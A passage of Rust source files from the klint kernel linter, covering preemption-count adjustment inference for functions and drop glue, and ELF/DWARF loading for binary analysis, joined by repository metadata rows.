if let Some(adj) = cx.drop_preemption_count_annotation(def.did()).adjustment {
info!("adjustment {} from annotation", adj);
return Ok(adj);
}
}
ty::Dynamic(pred, _) => {
if let Some(principal_trait) = pred.principal_def_id() {
if let Some(adj) = cx
.drop_preemption_count_annotation(principal_trait)
.adjustment
{
return Ok(adj);
}
}
return Ok(crate::atomic_context::VDROP_DEFAULT.0);
}
ty::Array(elem_ty, size) => {
let infcx = cx.tcx.infer_ctxt().build(TypingMode::PostAnalysis);
let size = rustc_trait_selection::traits::evaluate_const(
&infcx,
*size,
typing_env.param_env,
)
.try_to_target_usize(cx.tcx)
.ok_or(Error::TooGeneric);
if size == Ok(0) {
return Ok(0);
}
let elem_adj = cx.drop_adjustment(typing_env.as_query_input(*elem_ty))?;
if elem_adj == 0 {
return Ok(0);
}
let Ok(size) = i32::try_from(size?) else {
cx.drop_adjustment_overflow(poly_ty)?
};
let Some(adj) = size.checked_mul(elem_adj) else {
cx.drop_adjustment_overflow(poly_ty)?
};
return Ok(adj);
}
ty::Slice(elem_ty) => {
let elem_adj = cx.drop_adjustment(typing_env.as_query_input(*elem_ty))?;
if elem_adj != 0 {
let mut diag = cx.dcx().struct_err(
"dropping element of slice causes non-zero preemption count adjustment",
);
diag.note(format!(
"adjustment for dropping `{}` is {}",
elem_ty, elem_adj
));
diag.note(
"because slice can contain variable number of elements, adjustment \
for dropping the slice cannot be computed statically",
);
return Err(Error::Error(cx.emit_with_use_site_info(diag)));
}
return Ok(0);
}
_ => return Err(Error::TooGeneric),
}
// Do not call `resolve_drop_in_place` because we need typing_env.
let drop_in_place = cx.require_lang_item(LangItem::DropInPlace, DUMMY_SP);
let args = cx.mk_args(&[ty.into()]);
let instance = ty::Instance::try_resolve(cx.tcx, typing_env, drop_in_place, args)
.unwrap()
.unwrap();
let poly_instance = typing_env.as_query_input(instance);
assert!(matches!(
instance.def,
ty::InstanceKind::DropGlue(_, Some(_))
));
if cx
.call_stack
.borrow()
.iter()
.rev()
.any(|x| x.instance == poly_instance)
{
// Recursion encountered.
if typing_env.param_env.caller_bounds().is_empty() {
return Ok(0);
} else {
// If we are handling generic functions, then defer decision to monomorphization time.
return Err(Error::TooGeneric);
}
}
let mir = crate::mir::drop_shim::build_drop_shim(cx, instance.def_id(), typing_env, ty);
let result = cx.infer_adjustment(typing_env, instance, &mir);
// Recursion encountered.
if let Some(&recur) = cx.query_cache::<drop_adjustment>().borrow().get(&poly_ty) {
match (result, recur) {
(_, Err(Error::Error(_))) => bug!("recursive callee errors"),
// Error already reported.
(Err(Error::Error(_)), _) => (),
(Err(_), Err(_)) => (),
(Ok(a), Ok(b)) if a == b => (),
(Ok(_), Err(_)) => bug!("recursive callee too generic but caller is not"),
(Err(_), Ok(_)) => bug!("monormorphic caller too generic"),
(Ok(adj), Ok(_)) => {
let mut diag = cx.dcx().struct_span_err(
ty.ty_adt_def()
.map(|x| cx.def_span(x.did()))
.unwrap_or_else(|| cx.def_span(instance.def_id())),
"dropping this type causes recursion but preemption count adjustment is not 0",
);
diag.note(format!("adjustment is inferred to be {}", adj));
diag.note(format!("type being dropped is `{}`", ty));
diag.emit();
}
}
}
result
}
);
memoize!(
#[instrument(skip(cx), fields(poly_ty = %PolyDisplay(&poly_ty)), ret)]
pub fn drop_adjustment_check<'tcx>(
cx: &AnalysisCtxt<'tcx>,
poly_ty: PseudoCanonicalInput<'tcx, Ty<'tcx>>,
) -> Result<(), Error> {
let adjustment = cx.drop_adjustment(poly_ty)?;
let PseudoCanonicalInput {
typing_env,
value: ty,
} = poly_ty;
// If the type doesn't need drop, then there is trivially no adjustment.
if !ty.needs_drop(cx.tcx, typing_env) {
return Ok(());
}
let annotation;
match ty.kind() {
ty::Closure(..)
| ty::Coroutine(..)
| ty::Tuple(..)
| ty::Dynamic(..)
| ty::Array(..)
| ty::Slice(..) => return Ok(()),
// Box is always inferred
ty::Adt(def, _) if def.is_box() => return Ok(()),
ty::Adt(def, _) => {
// For Adts, we first try to not use any of the args and just try the most
// polymorphic version of the type.
let poly_typing_env = TypingEnv::post_analysis(cx.tcx, def.did());
let poly_args = cx
.erase_and_anonymize_regions(GenericArgs::identity_for_item(cx.tcx, def.did()));
let poly_poly_ty = poly_typing_env
.as_query_input(cx.tcx.mk_ty_from_kind(ty::Adt(*def, poly_args)));
if poly_poly_ty != poly_ty {
match cx.drop_adjustment_check(poly_poly_ty) {
Err(Error::TooGeneric) => (),
result => return result,
}
}
// If that fails, we try to use the args.
// Fallthrough to the MIR drop shim based logic.
annotation = cx.drop_preemption_count_annotation(def.did());
if let Some(adj) = annotation.adjustment {
assert!(adj == adjustment);
}
}
_ => return Err(Error::TooGeneric),
}
// If adjustment is inferred or the type is annotated as unchecked,
// then we don't need to do any further checks.
if annotation.adjustment.is_none() || annotation.unchecked {
return Ok(());
}
// Do not call `resolve_drop_in_place` because we need typing_env.
let drop_in_place = cx.require_lang_item(LangItem::DropInPlace, DUMMY_SP);
let args = cx.mk_args(&[ty.into()]);
let instance = ty::Instance::try_resolve(cx.tcx, typing_env, drop_in_place, args)
.unwrap()
.unwrap();
assert!(matches!(
instance.def,
ty::InstanceKind::DropGlue(_, Some(_))
));
let mir = crate::mir::drop_shim::build_drop_shim(cx, instance.def_id(), typing_env, ty);
let adjustment_infer = cx.infer_adjustment(typing_env, instance, &mir)?;
// Check if the inferred adjustment matches the annotation.
if let Some(adjustment) = annotation.adjustment {
if adjustment != adjustment_infer {
let mut diag = cx.dcx().struct_span_err(
cx.def_span(instance.def_id()),
format!(
"type annotated to have drop preemption count adjustment of {adjustment}"
),
);
diag.note(format!("but the adjustment inferred is {adjustment_infer}"));
cx.emit_with_use_site_info(diag);
}
}
Ok(())
}
);
memoize!(
#[instrument(skip(cx), fields(poly_instance = %PolyDisplay(&poly_instance)), ret)]
pub fn instance_adjustment<'tcx>(
cx: &AnalysisCtxt<'tcx>,
poly_instance: PseudoCanonicalInput<'tcx, Instance<'tcx>>,
) -> Result<i32, Error> {
let PseudoCanonicalInput {
typing_env,
value: instance,
} = poly_instance;
match instance.def {
// No Rust built-in intrinsics will mess with preemption count.
ty::InstanceKind::Intrinsic(_) => return Ok(0),
// Empty drop glue, then it definitely won't mess with preemption count.
ty::InstanceKind::DropGlue(_, None) => return Ok(0),
ty::InstanceKind::DropGlue(_, Some(ty)) => {
return cx.drop_adjustment(typing_env.as_query_input(ty));
}
ty::InstanceKind::Virtual(def_id, _) => {
if let Some(adj) = cx.preemption_count_annotation(def_id).adjustment {
return Ok(adj);
}
return Ok(crate::atomic_context::VCALL_DEFAULT.0);
}
_ => (),
}
let mut generic = false;
if matches!(instance.def, ty::InstanceKind::Item(_)) {
let poly_typing_env = TypingEnv::post_analysis(cx.tcx, instance.def_id());
let poly_args = cx.erase_and_anonymize_regions(GenericArgs::identity_for_item(
cx.tcx,
instance.def_id(),
));
let poly_poly_instance =
poly_typing_env.as_query_input(Instance::new_raw(instance.def_id(), poly_args));
generic = poly_poly_instance == poly_instance;
if !generic {
match cx.instance_adjustment(poly_poly_instance) {
Err(Error::TooGeneric) => (),
adjustment => return adjustment,
}
}
}
if cx.is_foreign_item(instance.def_id()) {
return Ok(cx
.ffi_property(instance)
.unwrap_or(crate::atomic_context::FFI_USE_DEFAULT)
.0);
}
if !cx.tcx.should_codegen_locally(instance) {
if let Some(p) = cx.sql_load::<instance_adjustment>(poly_instance) {
return p;
}
// If we cannot load it, use annotation (e.g. libcore).
return Ok(cx
.preemption_count_annotation(instance.def_id())
.adjustment
.unwrap_or(0));
}
// Use annotation if available.
if let Some(adj) = cx.preemption_count_annotation(instance.def_id()).adjustment {
info!("adjustment {} from annotation", adj);
return Ok(adj);
}
if cx
.call_stack
.borrow()
.iter()
.rev()
.any(|x| x.instance == poly_instance)
{
// Recursion encountered.
if typing_env.param_env.caller_bounds().is_empty() {
return Ok(0);
} else {
// If we are handling generic functions, then defer decision to monomorphization time.
return Err(Error::TooGeneric);
}
}
let mir = cx.analysis_instance_mir(instance.def);
let mut result = cx.infer_adjustment(typing_env, instance, mir);
// Recursion encountered.
if let Some(&recur) = cx
.query_cache::<instance_adjustment>()
.borrow()
.get(&poly_instance)
{
match (result, recur) {
(_, Err(Error::Error(_))) => {
// This should not happen because the recursive callee should either return 0
// or TooGeneric (see above).
bug!("recursive callee errors");
}
// Error already reported.
(Err(Error::Error(_)), _) => (),
(Err(Error::TooGeneric), Err(Error::TooGeneric)) => (),
(Ok(a), Ok(b)) if a == b => (),
(Ok(_), Err(Error::TooGeneric)) => {
// This can happen when the recursive call only occurs in a false, unwinding, or diverging path.
// (e.g. perform a recursive call, then diverge).
// In this case we still get the correct inferred value, *but* just using it
// will cause discrepancy with the non-TooGeneric case. So we instead just
// going to return `TooGeneric` so that it's tried later.
result = Err(Error::TooGeneric);
}
(Err(_), Ok(_)) => bug!("monormorphic caller too generic"),
(Ok(adj), Ok(_)) => {
let mut diag = cx.dcx().struct_span_err(
cx.def_span(instance.def_id()),
"this function is recursive but preemption count adjustment is not 0",
);
diag.note(format!("adjustment is inferred to be {}", adj));
if !generic {
diag.note(format!(
"instance being checked is `{}`",
PolyDisplay(&poly_instance)
));
}
diag.help(format!(
"try annotate the function with `#[klint::preempt_count(adjust = {adj})]`"
));
diag.emit();
}
}
}
if instance.def_id().is_local()
&& (generic || typing_env.param_env.caller_bounds().is_empty())
{
cx.sql_store::<instance_adjustment>(poly_instance, result);
}
if cx.should_report_preempt_count(instance.def_id()) {
let mut diag = cx.sess.dcx().struct_note(format!(
"reporting preemption count for instance `{}`",
PolyDisplay(&poly_instance)
));
diag.span(cx.def_span(instance.def_id()));
if let Ok(property) = result {
diag.note(format!("adjustment is inferred to be {}", property));
} else {
diag.note("adjustment inference failed because this function is too generic");
}
diag.emit();
}
result
}
);
memoize!(
#[instrument(skip(cx), fields(poly_instance = %PolyDisplay(&poly_instance)), ret)]
pub fn instance_adjustment_check<'tcx>(
cx: &AnalysisCtxt<'tcx>,
poly_instance: PseudoCanonicalInput<'tcx, Instance<'tcx>>,
) -> Result<(), Error> {
let adjustment = cx.instance_adjustment(poly_instance)?;
let PseudoCanonicalInput {
typing_env,
value: instance,
} = poly_instance;
// Only check locally codegenned instances.
if !cx.tcx.should_codegen_locally(instance) {
return Ok(());
}
match instance.def {
// No Rust built-in intrinsics will mess with preemption count.
ty::InstanceKind::Intrinsic(_) => return Ok(()),
// Empty drop glue, then it definitely won't mess with preemption count.
ty::InstanceKind::DropGlue(_, None) => return Ok(()),
ty::InstanceKind::DropGlue(_, Some(ty)) => {
return cx.drop_adjustment_check(typing_env.as_query_input(ty));
}
// Checked by indirect checks
ty::InstanceKind::Virtual(_, _) => return Ok(()),
_ => (),
}
// Prefer to do polymorphic check if possible.
if matches!(instance.def, ty::InstanceKind::Item(_)) {
let poly_typing_env = TypingEnv::post_analysis(cx.tcx, instance.def_id());
let poly_args = cx.erase_and_anonymize_regions(GenericArgs::identity_for_item(
cx.tcx,
instance.def_id(),
));
let poly_poly_instance =
poly_typing_env.as_query_input(Instance::new_raw(instance.def_id(), poly_args));
let generic = poly_poly_instance == poly_instance;
if !generic {
match cx.instance_adjustment_check(poly_poly_instance) {
Err(Error::TooGeneric) => (),
result => return result,
}
}
}
// We need to perform the following checks:
// * If there is an annotation, then `instance_adjustment` will just use that annotation.
// We need to make sure that the annotation is correct.
// * If trait impl method has annotation, then we need to check that whatever we infer/annotate from
// `instance_adjustment` matches that one.
// * If the method is callable from FFI, then we also need to check it matches our FFI adjustment.
let annotation = cx.preemption_count_annotation(instance.def_id());
if let Some(adj) = annotation.adjustment {
assert!(adj == adjustment);
}
if annotation.adjustment.is_some() && !annotation.unchecked {
let mir = cx.analysis_instance_mir(instance.def);
let adjustment_infer = cx.infer_adjustment(typing_env, instance, mir)?;
// Check if the inferred adjustment matches the annotation.
if adjustment != adjustment_infer {
let mut diag = cx.dcx().struct_span_err(
cx.def_span(instance.def_id()),
format!(
"function annotated to have preemption count adjustment of {adjustment}"
),
);
diag.note(format!("but the adjustment inferred is {adjustment_infer}"));
cx.emit_with_use_site_info(diag);
}
}
// Addition check for trait impl methods.
if matches!(instance.def, ty::InstanceKind::Item(_))
&& let Some(impl_) = cx.impl_of_assoc(instance.def_id())
&& let Some(trait_) = cx.impl_opt_trait_id(impl_)
{
let trait_def = cx.trait_def(trait_);
let trait_item = cx
.associated_items(impl_)
.in_definition_order()
.find(|x| x.def_id == instance.def_id())
.unwrap()
.trait_item_def_id()
.unwrap();
for ancestor in trait_def.ancestors(cx.tcx, impl_).unwrap() {
let Some(ancestor_item) = ancestor.item(cx.tcx, trait_item) else {
continue;
};
if let Some(ancestor_adj) = cx
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | true |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/binary_analysis/reconstruct.rs | src/binary_analysis/reconstruct.rs | use std::sync::Arc;
use rustc_data_structures::fx::FxHashMap;
use rustc_middle::mir::mono::MonoItem;
use rustc_middle::ty::{Instance, TyCtxt};
use rustc_middle::{mir, ty};
use rustc_span::{BytePos, DUMMY_SP, FileName, RemapPathScopeComponents, Span};
use crate::ctxt::AnalysisCtxt;
use crate::diagnostic::use_stack::UseSiteKind;
memoize!(
fn mono_items<'tcx>(cx: &AnalysisCtxt<'tcx>) -> Arc<Vec<MonoItem<'tcx>>> {
let mono_items = crate::monomorphize_collector::collect_crate_mono_items(
cx.tcx,
crate::monomorphize_collector::MonoItemCollectionStrategy::Lazy,
)
.0;
mono_items.into()
}
);
memoize!(
fn symbol_name_map<'tcx>(cx: &AnalysisCtxt<'tcx>) -> Arc<FxHashMap<&'tcx str, MonoItem<'tcx>>> {
let map = cx.mono_items();
Arc::new(
map.iter()
.map(|&item| (item.symbol_name(cx.tcx).name, item))
.collect(),
)
}
);
impl<'tcx> AnalysisCtxt<'tcx> {
pub fn symbol_name_to_mono(&self, name: &str) -> Option<MonoItem<'tcx>> {
self.symbol_name_map().get(name).copied()
}
}
pub fn recover_span_from_line_no<'tcx>(
tcx: TyCtxt<'tcx>,
location: &super::dwarf::Location,
) -> Option<Span> {
// Find the file in session's source map.
let source_map = tcx.sess.source_map();
let mut found_file = None;
for file in source_map.files().iter() {
if let FileName::Real(real) = &file.name {
if real.path(RemapPathScopeComponents::DEBUGINFO) == location.file {
found_file = Some(file.clone());
}
}
}
let Some(found_file) = found_file else {
return None;
};
let range = found_file.line_bounds((location.line as usize).saturating_sub(1));
Some(Span::with_root_ctxt(
BytePos(range.start.0 + location.column.saturating_sub(1) as u32),
// We only have a single column info. A good approximation is to extend to end of line (which is typically the case for function calls).
BytePos(range.end.0 - 1),
))
}
// Compare a recovered span from a compiler-produced span, and determine if they're likely the same source.
pub fn recover_span<'tcx>(recover_span: Span, span: Span) -> bool {
// Recovered span is produced through debug info. This will undergo the debuginfo collapse process.
// Before comparing, undergo the same process for `span`.
let collapsed = rustc_span::hygiene::walk_chain_collapsed(span, DUMMY_SP);
let range = collapsed.lo()..collapsed.hi();
range.contains(&recover_span.lo())
}
pub fn recover_fn_call_span<'tcx>(
tcx: TyCtxt<'tcx>,
caller: Instance<'tcx>,
callee: &str,
location: Option<&super::dwarf::Location>,
) -> Option<(Instance<'tcx>, UseSiteKind)> {
let mir = tcx.instance_mir(caller.def);
let mut callee_instance = None;
let mut sites = Vec::new();
for block in mir.basic_blocks.iter() {
let terminator = block.terminator();
// Skip over inlined body. We'll check them from scopes directly.
if mir.source_scopes[terminator.source_info.scope]
.inlined
.is_some()
{
continue;
}
match terminator.kind {
mir::TerminatorKind::Call { ref func, .. }
| mir::TerminatorKind::TailCall { ref func, .. } => {
let callee_ty = func.ty(mir, tcx);
let callee_ty = caller.instantiate_mir_and_normalize_erasing_regions(
tcx,
ty::TypingEnv::fully_monomorphized(),
ty::EarlyBinder::bind(callee_ty),
);
let ty::FnDef(def_id, args) = *callee_ty.kind() else {
continue;
};
let instance = ty::Instance::expect_resolve(
tcx,
ty::TypingEnv::fully_monomorphized(),
def_id,
args,
terminator.source_info.span,
);
if tcx.symbol_name(instance).name != callee {
continue;
}
callee_instance = Some(instance);
sites.push(UseSiteKind::Call(terminator.source_info.span));
}
mir::TerminatorKind::Drop { ref place, .. } => {
let ty = place.ty(mir, tcx).ty;
let ty = caller.instantiate_mir_and_normalize_erasing_regions(
tcx,
ty::TypingEnv::fully_monomorphized(),
ty::EarlyBinder::bind(ty),
);
let instance = Instance::resolve_drop_in_place(tcx, ty);
if tcx.symbol_name(instance).name != callee {
continue;
}
callee_instance = Some(instance);
sites.push(UseSiteKind::Drop {
drop_span: terminator.source_info.span,
place_span: mir.local_decls[place.local].source_info.span,
});
}
_ => continue,
};
}
// In addition to direct function calls, we should also inspect inlined functions.
for scope in mir.source_scopes.iter() {
if scope.inlined_parent_scope.is_none()
&& let Some((instance, span)) = scope.inlined
{
if tcx.symbol_name(instance).name != callee {
continue;
}
callee_instance = Some(instance);
sites.push(UseSiteKind::Call(span));
}
}
let Some(callee_instance) = callee_instance else {
tracing::error!("{} does not contain call to {}", caller, callee);
return None;
};
// If there's only a single span, then it has to be the correct span.
if sites.len() == 1 {
return Some((callee_instance, sites.pop().unwrap()));
}
// Otherwise, we need to use the DWARF location information to find the best related span.
let Some(loc) = &location else {
tracing::warn!(
"no way to distinguish {}'s use of {}",
caller,
callee_instance
);
return Some((callee_instance, sites.pop().unwrap()));
};
let Some(recovered_span) = recover_span_from_line_no(tcx, loc) else {
tracing::warn!(
"no way to distinguish {}'s use of {}",
caller,
callee_instance
);
return Some((callee_instance, sites.pop().unwrap()));
};
// Now we have a recovered span. Use this span to match spans that we have.
for site in sites {
if recover_span(recovered_span, site.span()) {
return Some((callee_instance, site));
}
}
// No perfect match, just use the recovered span that we have.
Some((callee_instance, UseSiteKind::Call(recovered_span)))
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/binary_analysis/dwarf.rs | src/binary_analysis/dwarf.rs | use std::num::NonZero;
use std::ops::Range;
use std::path::PathBuf;
use std::sync::Arc;
use std::{borrow::Cow, collections::BTreeMap};
use gimli::{
AttributeValue, DebuggingInformationEntry, Dwarf, EndianSlice, LineProgramHeader, LineRow, Unit,
};
use object::Object;
use object::{
Endian, File, ObjectSection, ObjectSymbol, RelocationKind, RelocationTarget, Section,
SectionIndex, elf::SHF_ALLOC,
};
use thiserror::Error;
#[derive(Debug, Error)]
pub enum Error {
#[error("{0}")]
Object(#[from] object::Error),
#[error("{0}")]
Gimli(gimli::Error),
#[error("unexpected ELF information: {0}")]
UnexpectedElf(&'static str),
#[error("unexpected DWARF information: {0}")]
UnexpectedDwarf(&'static str),
#[error("{0}")]
Other(&'static str),
}
impl From<gimli::Error> for Error {
fn from(value: gimli::Error) -> Self {
Self::Gimli(value)
}
}
// Section address encoder and decoder.
//
// `gimli` library does not natively handle relocations; this is fine for binaries, but for relocatable
// object files, sections begin with address 0 and you cannot tell apart different sections by looking at address.
//
// To solve this, we lay all sections flat in memory (with some gaps between in cases there are pointers going beyond section boundaries).
// We can then use these offsets to provide revese lookup to determine the symbolic addresses.
struct SectionLayout {
forward_map: Vec<(u64, u64)>,
reverse_map: BTreeMap<u64, usize>,
}
impl SectionLayout {
const SECTION_GAP: u64 = 65536;
fn for_object<'data>(object: &File<'data>) -> Result<Self, Error> {
fn section_alloc(section: &Section<'_, '_>) -> bool {
match section.flags() {
object::SectionFlags::None => false,
object::SectionFlags::Elf { sh_flags } => sh_flags & SHF_ALLOC as u64 != 0,
_ => bug!(),
}
}
let section_count = object
.sections()
.map(|x| x.index().0)
.max()
.unwrap_or_default()
+ 1;
// All non-allocate sections go to address 0, where we pre-allocate based on the maximum size.
let unalloc_sections_max = object
.sections()
.filter(section_alloc)
.map(|x| x.size())
.max()
.unwrap_or(0);
let overflow_err =
|| Error::UnexpectedElf("cannot lay all sections in 64-bit address space");
let mut allocated = unalloc_sections_max
.checked_add(Self::SECTION_GAP)
.ok_or_else(overflow_err)?;
let mut forward_map = vec![(0, 0); section_count];
let mut reverse_map = BTreeMap::new();
for section in object.sections() {
let index = section.index();
if !section_alloc(§ion) {
forward_map[index.0] = (0, section.size());
continue;
}
let address = allocated
.checked_next_multiple_of(section.align())
.ok_or_else(overflow_err)?;
forward_map[index.0] = (address, section.size());
reverse_map.insert(address, index.0);
allocated = address
.checked_add(section.size())
.ok_or_else(overflow_err)?
.checked_add(Self::SECTION_GAP)
.ok_or_else(overflow_err)?;
}
if allocated
.checked_add(Self::SECTION_GAP)
.ok_or_else(overflow_err)?
> i64::MAX as u64
{
Err(overflow_err())?;
}
Ok(SectionLayout {
forward_map,
reverse_map,
})
}
fn encode(&self, section: SectionIndex, offset: i64) -> Result<u64, Error> {
let (address, size) = self.forward_map[section.0];
if offset < -(Self::SECTION_GAP as i64 / 2)
|| offset > (size + Self::SECTION_GAP / 2) as i64
{
Err(Error::UnexpectedElf("symbol offset too big"))?
}
Ok(address.wrapping_add(offset as _))
}
fn decode(&self, address: u64) -> Result<(SectionIndex, i64), Error> {
let address_plus_gap = address
.checked_add(Self::SECTION_GAP / 2)
.ok_or(Error::UnexpectedElf("unexpected symbol offset"))?;
let Some((§ion_start, &index)) = self.reverse_map.range(..address_plus_gap).next_back()
else {
Err(Error::UnexpectedElf(
"address from unallocated section cannot be decoded",
))?
};
let offset = (address as i64).wrapping_sub(section_start as _);
assert_eq!(self.encode(SectionIndex(index), offset).unwrap(), address);
Ok((SectionIndex(index), offset))
}
}
fn load_section<'file, 'data>(
object: &'file File<'data>,
layout: &SectionLayout,
name: &str,
) -> Result<Cow<'data, [u8]>, Error> {
let Some(section) = object.section_by_name(name) else {
return Ok(Cow::Borrowed(&[]));
};
let mut data = section.uncompressed_data()?;
for (offset, reloc) in section.relocations() {
let data_mut = data.to_mut();
let (symbol_section_index, symbol_offset) = match reloc.target() {
RelocationTarget::Symbol(symbol) => {
let symbol = object
.symbol_by_index(symbol)
.map_err(|_| Error::UnexpectedElf("symbol not found"))?;
let Some(section_index) = symbol.section().index() else {
Err(Error::UnexpectedElf(
"symbol is not associated with a section",
))?
};
(section_index, symbol.address())
}
RelocationTarget::Section(section_index) => (section_index, 0),
RelocationTarget::Absolute | _ => Err(Error::UnexpectedElf(
"absolute relocation target found in DWARF section",
))?,
};
let symbol_section = object
.section_by_index(symbol_section_index)
.map_err(|_| Error::UnexpectedElf("section not found"))?;
if symbol_section.address() != 0 {
Err(Error::UnexpectedElf(
"section address is non-zero in a relocatable file",
))?
}
let address = layout.encode(symbol_section_index, symbol_offset as _)?;
let value = match reloc.kind() {
RelocationKind::Absolute => reloc.addend().wrapping_add(address as _),
RelocationKind::Relative => {
let ptr = layout.encode(section.index(), offset as _)?;
reloc
.addend()
.wrapping_add(address as _)
.wrapping_sub(ptr as _)
}
_ => Err(Error::UnexpectedElf("unknown relocation kind found"))?,
};
match reloc.size() {
32 => {
let addend = if reloc.has_implicit_addend() {
i32::from_le_bytes(data_mut[offset as usize..][..4].try_into().unwrap())
} else {
0
};
let value: i32 = value
.wrapping_add(addend as i64)
.try_into()
.map_err(|_| Error::UnexpectedElf("relocation truncated to fit"))?;
data_mut[offset as usize..][..4].copy_from_slice(&value.to_le_bytes());
}
64 => {
let addend = if reloc.has_implicit_addend() {
i64::from_le_bytes(data_mut[offset as usize..][..8].try_into().unwrap())
} else {
0
};
let value = value.wrapping_add(addend as i64);
data_mut[offset as usize..][..8].copy_from_slice(&value.to_le_bytes());
}
_ => Err(Error::UnexpectedElf("unknown relocation size"))?,
}
}
Ok(data)
}
type ReaderTy<'a> = EndianSlice<'a, gimli::LittleEndian>;
pub struct DwarfLoader<'file, 'data> {
section_layout: SectionLayout,
// This is actually `Dwarf<ReaderTy<'dwarf_sections>`.
dwarf: Dwarf<ReaderTy<'file>>,
#[allow(unused)]
dwarf_sections: Arc<gimli::DwarfSections<Cow<'data, [u8]>>>,
#[allow(unused)]
eh_frame_section: Cow<'data, [u8]>,
}
#[derive(Clone, Debug)]
pub struct Location {
pub file: PathBuf,
pub line: u64,
pub column: u64,
}
#[derive(Debug)]
pub struct Call {
pub caller: String,
pub callee: String,
pub location: Option<Location>,
}
impl<'file, 'data> DwarfLoader<'file, 'data> {
pub fn new(object: &'file File<'data>) -> Result<Self, Error> {
if !object.endianness().is_little_endian() {
Err(Error::UnexpectedElf(
"only little endian object files are supported",
))?
}
let section_layout = SectionLayout::for_object(object)?;
let dwarf_sections = Arc::new(gimli::DwarfSections::load(|id| {
load_section(object, §ion_layout, id.name())
})?);
// Also load `.eh_frame` which may be present in place of `.debug_frame`.
let eh_frame_section = load_section(object, §ion_layout, ".eh_frame")?;
let dwarf =
dwarf_sections.borrow(|section| gimli::EndianSlice::new(section, gimli::LittleEndian));
// SAFETY: erase lifetime. This is fine as `dwarf` will be dropped before `dwarf_sections`.
let dwarf_transmute =
unsafe { std::mem::transmute::<Dwarf<ReaderTy<'_>>, Dwarf<ReaderTy<'_>>>(dwarf) };
Ok(Self {
section_layout,
dwarf: dwarf_transmute,
dwarf_sections,
eh_frame_section,
})
}
// This returns the correct lifetime instead of the hacked one.
fn dwarf(&self) -> &Dwarf<ReaderTy<'_>> {
&self.dwarf
}
/// Obtain the linkage name of a subprogram or inlined subroutine.
fn linkage_name(
&self,
unit: &Unit<ReaderTy<'_>>,
die: &DebuggingInformationEntry<'_, '_, ReaderTy<'_>>,
) -> Result<String, Error> {
let mut attrs = die.attrs();
let mut name = None;
let mut deleg = None;
while let Some(attr) = attrs.next()? {
match attr.name() {
gimli::DW_AT_linkage_name => {
return Ok(self
.dwarf()
.attr_string(unit, attr.value())?
.to_string()?
.to_owned());
}
gimli::DW_AT_name => {
name = Some(
self.dwarf()
.attr_string(unit, attr.value())?
.to_string()?
.to_owned(),
);
}
gimli::DW_AT_abstract_origin | gimli::DW_AT_specification => {
// Delegation
deleg = Some(attr.value());
}
_ => (),
}
}
if let Some(name) = name {
return Ok(name);
}
let Some(refer) = deleg else {
Err(Error::UnexpectedDwarf(
"Cannot find name for DW_TAG_subprogram",
))?
};
match refer {
AttributeValue::UnitRef(offset) => {
let mut entries = unit.entries_at_offset(offset)?;
entries
.next_entry()?
.ok_or(Error::UnexpectedDwarf("Referenced entry not found"))?;
let next_die = entries.current().unwrap();
self.linkage_name(unit, next_die)
}
_ => Err(Error::UnexpectedDwarf("Unsupported reference type"))?,
}
}
/// Obtain PC ranges related to a DIE.
fn ranges(
&self,
unit: &Unit<ReaderTy<'_>>,
die: &DebuggingInformationEntry<'_, '_, ReaderTy<'_>>,
) -> Result<(SectionIndex, Vec<Range<i64>>), Error> {
let mut ranges = Vec::new();
let mut attrs = die.attrs();
while let Some(attr) = attrs.next()? {
match attr.name() {
gimli::DW_AT_low_pc => {
let Some(low_pc) = self.dwarf().attr_address(unit, attr.value())? else {
Err(Error::UnexpectedDwarf("DW_AT_low_pc is not an address"))?
};
let Some(high_pc) = die.attr_value(gimli::DW_AT_high_pc)? else {
Err(Error::UnexpectedDwarf(
"DW_AT_high_pc not found at DW_TAG_inlined_subroutine",
))?
};
let Some(high_pc) = high_pc.udata_value() else {
Err(Error::UnexpectedDwarf("DW_AT_high_pc is not udata"))?
};
ranges.push((low_pc, high_pc));
}
// This is handled by DW_AT_low_pc.
gimli::DW_AT_high_pc => (),
gimli::DW_AT_ranges => {
let offset = match attr.value() {
AttributeValue::DebugRngListsIndex(offset) => {
self.dwarf().ranges_offset(unit, offset)?
}
AttributeValue::RangeListsRef(offset) => {
self.dwarf().ranges_offset_from_raw(unit, offset)
}
_ => Err(Error::UnexpectedDwarf(
"DW_AT_ranges is not rnglist reference",
))?,
};
let mut range = self.dwarf().ranges(unit, offset)?;
while let Some(range) = range.next()? {
ranges.push((range.begin, range.end.wrapping_sub(range.begin)));
}
}
_ => (),
}
}
if ranges.is_empty() {
return Ok((SectionIndex(0), Vec::new()));
}
let encoded_section = self.section_layout.decode(ranges[0].0)?.0;
let ranges = ranges
.into_iter()
.map(|(begin, len)| {
let (sec, begin) = self.section_layout.decode(begin)?;
if sec != encoded_section {
return Err(Error::UnexpectedDwarf(
"Single DIE covers multiple sections",
));
}
Ok(begin..begin.wrapping_add(len as _))
})
.collect::<Result<_, _>>()?;
Ok((encoded_section, ranges))
}
fn call_location(
&self,
unit: &Unit<ReaderTy<'_>>,
die: &DebuggingInformationEntry<'_, '_, ReaderTy<'_>>,
) -> Result<Option<Location>, Error> {
let Some(file) = die.attr(gimli::DW_AT_call_file)? else {
// This may happen when two calls from different files are merged.
return Ok(None);
};
let file = self.file_name(
unit,
unit.line_program
.as_ref()
.ok_or(Error::UnexpectedDwarf("line number table not present"))?
.header(),
file.udata_value()
.ok_or(Error::UnexpectedDwarf("file number is not udata"))?,
)?;
let Some(line) = die.attr(gimli::DW_AT_call_line)? else {
// This may happen when two calls from different lines are merged.
return Ok(None);
};
let line = line
.udata_value()
.ok_or(Error::UnexpectedDwarf("line number is not udata"))?;
let column = match die.attr(gimli::DW_AT_call_column)? {
None => 0,
Some(column) => column
.udata_value()
.ok_or(Error::UnexpectedDwarf("column number is not udata"))?,
};
Ok(Some(Location { file, line, column }))
}
pub fn inline_info<'tcx>(
&self,
section_index: SectionIndex,
offset: u64,
) -> Result<Vec<Call>, Error> {
let mut iter = self.dwarf.units();
let mut callstack = Vec::<Call>::new();
while let Some(header) = iter.next()? {
let unit = self.dwarf.unit(header)?;
